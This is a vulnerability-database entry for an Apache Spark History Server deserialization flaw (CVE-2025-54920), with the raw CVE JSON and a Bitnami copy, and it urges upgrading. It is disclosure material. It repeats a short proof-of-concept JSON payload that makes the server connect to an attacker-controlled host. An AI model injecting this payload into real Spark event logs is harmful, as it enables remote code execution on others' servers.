Vulnerability-Lookup

CVE-2025-54920 (GCVE-0-2025-54920)

Vulnerability from cvelistv5 – Published: 2026-03-14 09:01 – Updated: 2026-03-17 12:45

Title

Apache Spark: Spark History Server Code Execution Vulnerability

Summary

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

Severity ?

No CVSS data available.

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

apache

References

URL

Tags

	https://github.com/apache/spark/pull/51312	patch
	https://github.com/apache/spark/pull/51323	patch
	https://issues.apache.org/jira/browse/SPARK-52381	issue-tracking
	https://lists.apache.org/thread/4y9n0nfj7m68o2hpm…	vendor-advisory

Impacted products

	Vendor	Product	Version
	Apache Software Foundation	Apache Spark	Affected: 0 , < 3.5.7 (semver) Affected: 4.0.0 , < 4.0.1 (semver)

Credits

Alexandre Pujol (Linagora)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2026-03-14T09:12:25.119Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/03/13/4"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2025-54920",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-17T03:55:33.419437Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-17T12:45:29.903Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://mvnrepository.com/artifact/org.apache.spark/spark-core",
          "defaultStatus": "unaffected",
          "packageName": "org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12",
          "product": "Apache Spark",
          "vendor": "Apache Software Foundation",
          "versions": [
            {
              "lessThan": "3.5.7",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThan": "4.0.1",
              "status": "affected",
              "version": "4.0.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Alexandre Pujol (Linagora)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eThis issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003eSummary\u003c/b\u003e\u003c/p\u003e\u003cp\u003eApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003e\u003cbr\u003e\u003c/b\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003eDetails\u003c/b\u003e\u003c/p\u003e\u003cp\u003eThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with \u003ccode\u003e@JsonTypeInfo.Id.CLASS\u003c/code\u003e on \u003ccode\u003eSparkListenerEvent\u003c/code\u003e objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as \u003ccode\u003eorg.apache.hive.jdbc.HiveConnection\u003c/code\u003e, which can perform network calls or other malicious actions during deserialization.\u003c/p\u003e\n\u003cp\u003eThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\u003c/p\u003e\u003cbr\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eProof of Concept:\u003c/strong\u003e\u003c/p\u003e1. Run Spark with event logging enabled, writing to a writable directory (\u003ccode\u003espark-logs\u003c/code\u003e).\u003cp\u003e\u003c/p\u003e\u003cp\u003e2. Inject the following JSON at the beginning of an event log file:\n\u003c/p\u003e\u003cpre\u003e\u003cdiv\u003e\u003cdiv\u003e{\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003e  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://\u0026lt;IP\u0026gt;:\u0026lt;PORT\u0026gt;/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://\u0026lt;IP\u0026gt;:\u0026lt;PORT\u0026gt;\"\n  }\n}\u003c/code\u003e\u003c/div\u003e\u003c/div\u003e\u003c/pre\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e3. Start the Spark History Server with logs pointing to the modified directory.\u003c/p\u003e\u003cp\u003e4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\u003cbr\u003e\u003c/p\u003e\n\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003e\u003cbr\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eImpact\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.\u003c/p\u003e\n\u003cp\u003e\u003c/p\u003e\u003cbr\u003e"
            }
          ],
          "value": "This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\n\n\n\n\n\nSummary\n\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\n\n\n\n\n\nDetails\n\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\n\n\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\n\n\n\n\n\n\nProof of Concept:\n\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\n\n2. Inject the following JSON at the beginning of an event log file:\n\n\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://\u003cIP\u003e:\u003cPORT\u003e\"\n  }\n}\n\n\n\n\n\n\n\n3. Start the Spark History Server with logs pointing to the modified directory.\n\n4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\n\n\n\n\n\n\n\n\n\n\nImpact\n\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "text": "low"
            },
            "type": "Textual description of severity"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502 Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-14T09:01:50.486Z",
        "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "shortName": "apache"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/apache/spark/pull/51312"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/apache/spark/pull/51323"
        },
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://issues.apache.org/jira/browse/SPARK-52381"
        },
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s"
        }
      ],
      "source": {
        "defect": [
          "SPARK-52381"
        ],
        "discovery": "UNKNOWN"
      },
      "title": "Apache Spark: Spark History Server Code Execution Vulnerability",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
    "assignerShortName": "apache",
    "cveId": "CVE-2025-54920",
    "datePublished": "2026-03-14T09:01:50.486Z",
    "dateReserved": "2025-08-01T01:09:45.224Z",
    "dateUpdated": "2026-03-17T12:45:29.903Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-54920\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2026-03-16T14:17:59.877\",\"lastModified\":\"2026-03-20T19:16:45.837\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\\n\\n\\n\\n\\n\\nSummary\\n\\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\\n\\n\\n\\n\\n\\nDetails\\n\\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\\n\\n\\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\\n\\n\\n\\n\\n\\n\\nProof of Concept:\\n\\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\\n\\n2. Inject the following JSON at the beginning of an event log file:\\n\\n\\n{\\n\\n  \\\"Event\\\": \\\"org.apache.hive.jdbc.HiveConnection\\\",\\n  \\\"uri\\\": \\\"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\\\",\\n  \\\"info\\\": {\\n    \\\"hive.metastore.uris\\\": \\\"thrift://\u003cIP\u003e:\u003cPORT\u003e\\\"\\n  }\\n}\\n\\n\\n\\n\\n\\n\\n\\n3. Start the Spark History Server with logs pointing to the modified directory.\\n\\n4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nImpact\\n\\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.\"},{\"lang\":\"es\",\"value\":\"Este problema afecta a Apache Spark: antes de 3.5.7 y 4.0.1. Se recomienda a los usuarios actualizar a la versi\u00f3n 3.5.7 o 4.0.1 y posteriores, que corrige el problema.\\n\\nResumen\\n\\nApache Spark 3.5.4 y versiones anteriores contienen una vulnerabilidad de ejecuci\u00f3n de c\u00f3digo en la interfaz de usuario web de Spark History debido a una deserializaci\u00f3n de Jackson excesivamente permisiva de los datos del registro de eventos. Esto permite a un atacante con acceso al directorio de registros de eventos de Spark inyectar cargas \u00fatiles JSON maliciosas que desencadenan la deserializaci\u00f3n de clases arbitrarias, lo que permite la ejecuci\u00f3n de comandos en el host que ejecuta el Spark History Server.\\n\\nDetalles\\n\\nLa vulnerabilidad surge porque el Spark History Server utiliza la deserializaci\u00f3n polim\u00f3rfica de Jackson con @JsonTypeInfo.Id.CLASS en objetos SparkListenerEvent, lo que permite a un atacante especificar nombres de clase arbitrarios en el JSON del evento. Este comportamiento permite instanciar clases no deseadas, como org.apache.hive.jdbc.HiveConnection, que pueden realizar llamadas de red u otras acciones maliciosas durante la deserializaci\u00f3n.\\n\\nEl atacante puede explotar esto inyectando contenido JSON manipulado en los archivos de registro de eventos de Spark, que el History Server luego deserializa al iniciar o al cargar los registros de eventos. Por ejemplo, el atacante puede forzar al History Server a abrir una conexi\u00f3n JDBC a un servidor remoto controlado por el atacante, demostrando la capacidad de inyecci\u00f3n de comandos remota.\\n\\nPrueba de concepto:\\n\\n1. Ejecute Spark con el registro de eventos habilitado, escribiendo en un directorio con permisos de escritura (spark-logs).\\n\\n2. Inyecte el siguiente JSON al principio de un archivo de registro de eventos:\\n\\n{\\n\\n  \\\"Event\\\": \\\"org.apache.hive.jdbc.HiveConnection\\\",\\n  \\\"uri\\\": \\\"jdbc:hive2://:/\\\",\\n  \\\"info\\\": {\\n    \\\"hive.metastore.uris\\\": \\\"thrift://:\\\"\\n  }\\n}\\n\\n3. Inicie el Spark History Server con los registros apuntando al directorio modificado.\\n\\n4. El Spark History Server inicia una conexi\u00f3n JDBC al servidor del atacante, confirmando la inyecci\u00f3n.\\n\\nImpacto\\n\\nUn atacante con acceso de escritura a los registros de eventos de Spark puede ejecutar c\u00f3digo arbitrario en el servidor que ejecuta el History Server, comprometiendo potencialmente todo el sistema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.5.7\",\"matchCriteriaId\":\"9D7D7694-BC03-478D-9F4B-143441071D93\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"DDCC2B9D-079B-4E07-9043-B11203EC9F2D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"EFBBB699-7556-4930-B57C-77B61EF11F54\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"19E77AEE-7D2B-4A88-BB46-B214EBF0FD92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"85BD7BB3-7A01-4A4F-BED5-FFC89071192A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"50984263-15BA-4538-B7B7-D13C18FFD4D6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc5:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF184C3A-6625-42DF-BAF8-052614E1670B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc6:*:*:*:*:*:*\",\"matchCriteriaId\":\"8631C8B2-821B-4E44-97EC-DD670C9FC730\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.0:rc7:*:*:*:*:*:*\",\"matchCriteriaId\":\"37BF5C2F-9A7B-4084-9F7F-11DB4199631C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:spark:4.0.1:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"8A685F3A-5A0F-4AC9-A07B-1C596B8B4596\"}]}]}],\"references\":[{\"url\":\"https://github.com/apache/spark/pull/51312\",\"source\":\"security@apache.org\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/apache/spark/pull/51323\",\"source\":\"security@apache.org\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://issues.apache.org/jira/browse/SPARK-52381\",\"source\":\"security@apache.org\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s\",\"source\":\"security@apache.org\",\"tags\":[\"Mitigation\",\"Vendor Advisory\",\"Exploit\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2026/03/13/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\",\"Exploit\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.openwall.com/lists/oss-security/2026/03/13/4\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-03-14T09:12:25.119Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54920\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-17T03:55:33.419437Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-17T12:45:26.034Z\"}}], \"cna\": {\"title\": \"Apache Spark: Spark History Server Code Execution Vulnerability\", \"source\": {\"defect\": [\"SPARK-52381\"], \"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Alexandre Pujol (Linagora)\"}], \"metrics\": [{\"other\": {\"type\": \"Textual description of severity\", \"content\": {\"text\": \"low\"}}}], \"affected\": [{\"vendor\": \"Apache Software Foundation\", \"product\": \"Apache Spark\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"3.5.7\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"4.0.0\", \"lessThan\": \"4.0.1\", \"versionType\": \"semver\"}], \"packageName\": \"org.apache.spark:spark-core_2.13, org.apache.spark:spark-core_2.12\", \"collectionURL\": \"https://mvnrepository.com/artifact/org.apache.spark/spark-core\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/apache/spark/pull/51312\", \"tags\": [\"patch\"]}, {\"url\": \"https://github.com/apache/spark/pull/51323\", \"tags\": [\"patch\"]}, {\"url\": \"https://issues.apache.org/jira/browse/SPARK-52381\", \"tags\": [\"issue-tracking\"]}, {\"url\": \"https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s\", \"tags\": [\"vendor-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\\n\\n\\n\\n\\n\\nSummary\\n\\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\\n\\n\\n\\n\\n\\nDetails\\n\\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\\n\\n\\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\\n\\n\\n\\n\\n\\n\\nProof of Concept:\\n\\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\\n\\n2. Inject the following JSON at the beginning of an event log file:\\n\\n\\n{\\n\\n  \\\"Event\\\": \\\"org.apache.hive.jdbc.HiveConnection\\\",\\n  \\\"uri\\\": \\\"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\\\",\\n  \\\"info\\\": {\\n    \\\"hive.metastore.uris\\\": \\\"thrift://\u003cIP\u003e:\u003cPORT\u003e\\\"\\n  }\\n}\\n\\n\\n\\n\\n\\n\\n\\n3. Start the Spark History Server with logs pointing to the modified directory.\\n\\n4. The Spark History Server initiates a JDBC connection to the attacker\\u2019s server, confirming the injection.\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nImpact\\n\\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eThis issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003eSummary\u003c/b\u003e\u003c/p\u003e\u003cp\u003eApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\u003cbr\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003e\u003cbr\u003e\u003c/b\u003e\u003c/p\u003e\u003cp\u003e\u003cb\u003eDetails\u003c/b\u003e\u003c/p\u003e\u003cp\u003eThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with \u003ccode\u003e@JsonTypeInfo.Id.CLASS\u003c/code\u003e on \u003ccode\u003eSparkListenerEvent\u003c/code\u003e objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as \u003ccode\u003eorg.apache.hive.jdbc.HiveConnection\u003c/code\u003e, which can perform network calls or other malicious actions during deserialization.\u003c/p\u003e\\n\u003cp\u003eThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\u003c/p\u003e\u003cbr\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eProof of Concept:\u003c/strong\u003e\u003c/p\u003e1. Run Spark with event logging enabled, writing to a writable directory (\u003ccode\u003espark-logs\u003c/code\u003e).\u003cp\u003e\u003c/p\u003e\u003cp\u003e2. Inject the following JSON at the beginning of an event log file:\\n\u003c/p\u003e\u003cpre\u003e\u003cdiv\u003e\u003cdiv\u003e{\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003e  \\\"Event\\\": \\\"org.apache.hive.jdbc.HiveConnection\\\",\\n  \\\"uri\\\": \\\"jdbc:hive2://\u0026lt;IP\u0026gt;:\u0026lt;PORT\u0026gt;/\\\",\\n  \\\"info\\\": {\\n    \\\"hive.metastore.uris\\\": \\\"thrift://\u0026lt;IP\u0026gt;:\u0026lt;PORT\u0026gt;\\\"\\n  }\\n}\u003c/code\u003e\u003c/div\u003e\u003c/div\u003e\u003c/pre\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e3. Start the Spark History Server with logs pointing to the modified directory.\u003c/p\u003e\u003cp\u003e4. The Spark History Server initiates a JDBC connection to the attacker\\u2019s server, confirming the injection.\u003cbr\u003e\u003c/p\u003e\\n\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003e\u003cbr\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eImpact\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.\u003c/p\u003e\\n\u003cp\u003e\u003c/p\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502 Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"shortName\": \"apache\", \"dateUpdated\": \"2026-03-14T09:01:50.486Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54920\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-17T12:45:29.903Z\", \"dateReserved\": \"2025-08-01T01:09:45.224Z\", \"assignerOrgId\": \"f0158376-9dc2-43b6-827c-5f631a4d8d09\", \"datePublished\": \"2026-03-14T09:01:50.486Z\", \"assignerShortName\": \"apache\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

bit-spark-2025-54920

Vulnerability from bitnami_vulndb

Published

2026-03-18 08:54

Modified

2026-03-20 09:47

Summary

Apache Spark: Spark History Server Code Execution Vulnerability

Details

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

Proof of Concept:

Run Spark with event logging enabled, writing to a writable directory (spark-logs).
Inject the following JSON at the beginning of an event log file:

{

"Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://:/", "info": { "hive.metastore.uris": "thrift://:" } }

